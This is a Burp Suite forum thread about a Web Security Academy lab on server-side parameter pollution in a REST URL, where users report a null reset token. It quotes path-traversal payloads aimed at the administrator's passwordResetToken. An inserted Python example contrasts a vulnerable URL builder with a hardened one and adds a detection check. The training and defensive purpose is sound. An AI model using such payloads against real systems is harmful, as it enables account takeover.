Burp Suite User Forum

Issue in an Academy Lab

Viktor | Last updated: Jan 04, 2024 04:12PM UTC

Hello, it would seem that there is an issue with the Lab for: "Exploiting server-side parameter pollution in a REST URL". After the request for the passwordResetToken is submitted, the response does not have a valid password reset token; the value is null.

Payload user:
csrf=rHNJ6uYSDiGqDlMc5eYu9RMfjQWmVrQK&username=carlos%2f..%2f..%2f..%2fv1%2fusers%2fadministrator%2ffield%2fpasswordResetToken%23

Response:
HTTP/1.1 500
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Encoding: gzip
Content-Length: 120

{ "error": "Unexpected response from API server:\n{\n \"type\": \"passwordResetToken\",\n \"result\": null\n}" }

This also happens if I use the example payload from the solution page.
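The payload in this post relies on the front end splicing the raw username into the backend REST path, so that "../" segments walk the path to a different resource and "#" (encoded as %23) cuts off whatever the server appends after it. The following is an added example, not code from the lab or from PortSwigger: it models that weak URL construction beside a hardened version that allow-lists the username and percent-encodes it into a single path segment, plus a simple check a defender could run over request logs. The API base URL is a hypothetical placeholder.

```python
import posixpath
import re
from urllib.parse import quote, unquote, urlsplit

# Hypothetical internal API base (placeholder, not the lab's real backend).
API_BASE = "https://api.internal.example/v1"

# The username value from the thread above, as the front end sees it after
# one round of form decoding (%2f -> "/", %23 -> "#").
RAW_PAYLOAD = "carlos%2f..%2f..%2f..%2fv1%2fusers%2fadministrator%2ffield%2fpasswordResetToken%23"
PAYLOAD_USERNAME = unquote(RAW_PAYLOAD)

# Allow-list: must start with an alphanumeric so "." and ".." are rejected,
# then only characters that cannot act as path or query delimiters.
USERNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def build_url_vulnerable(username: str) -> str:
    """Weak pattern: the raw username is interpolated straight into the REST path."""
    return f"{API_BASE}/users/{username}/field/email"


def build_url_hardened(username: str) -> str:
    """Validate against the allow-list, then encode so the value is one path segment."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allow-list")
    # safe='' also encodes "/", so even a permitted value can never add segments.
    return f"{API_BASE}/users/{quote(username, safe='')}/field/email"


def backend_path(url: str) -> str:
    """Model what the HTTP client/server does with the URL: drop the fragment
    after '#', then collapse '.' and '..' segments."""
    parts = urlsplit(url)
    return posixpath.normpath(parts.path)


def looks_like_parameter_pollution(raw_value: str) -> bool:
    """Cheap log/WAF check: after decoding, does the value carry path or
    delimiter characters that a plain username never needs?"""
    decoded = unquote(raw_value)
    return any(marker in decoded for marker in ("..", "/", "#", "?", "&"))


if __name__ == "__main__":
    weak = build_url_vulnerable(PAYLOAD_USERNAME)
    print("vulnerable URL :", weak)
    print("backend sees   :", backend_path(weak))
    print("hardened (ok)  :", build_url_hardened("carlos"))
    try:
        build_url_hardened(PAYLOAD_USERNAME)
    except ValueError as exc:
        print("hardened (bad) :", exc)
    print("flag raw value :", looks_like_parameter_pollution(RAW_PAYLOAD))
```

Running the script shows the vulnerable URL resolving to /v1/users/administrator/field/passwordResetToken (the "/field/email" suffix is discarded as a fragment), while the hardened builder rejects the same input before any request is made. The detection helper is deliberately broad; tune it to the parameters your own application actually forwards.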

Michelle, PortSwigger Agent | Last updated: Jan 05, 2024 09:20AM UTC

Hi, I've just run through the lab and could solve it using the provided solution. I used the suggested payload from the solution, so the whole line looked like this:
csrf=SgHtyMMe996rqgWWRsXggM4u3fYWq4Wh&username=../../v1/users/administrator/field/passwordResetToken%23

If you're still having issues, can you send an email to support@portswigger.net with screenshots or a screen recording of the steps you're taking?

Viktor | Last updated: Jan 08, 2024 11:29AM UTC

Thank you, I've just sent an email.

Michelle, PortSwigger Agent | Last updated: Jan 08, 2024 11:59AM UTC

Thanks :) We've got your mail. We'll take a look and be in touch soon.

Umer | Last updated: Jul 31, 2024 03:56AM UTC

Hi! Were you able to solve this? I am facing the exact same issue even after several months.

Michelle, PortSwigger Agent | Last updated: Jul 31, 2024 12:18PM UTC

Hi, I have successfully solved this lab in the past. What problems are you experiencing now? Have you clicked on 'Forgot password' for the administrator user before using the payload, to make sure a password reset token exists?

Umer | Last updated: Aug 01, 2024 03:40PM UTC

I was unable to solve it myself. I used the provided solution, but instead of the reset_token I get:
{ "error": "Unexpected response from API server:\n{\n \"type\": \"passwordResetToken\",\n \"result\": null\n}" }
exactly the same as mentioned above.

Michelle, PortSwigger Agent | Last updated: Aug 02, 2024 10:55AM UTC

Could you email a screen recording of the steps you're taking to support@portswigger.net please?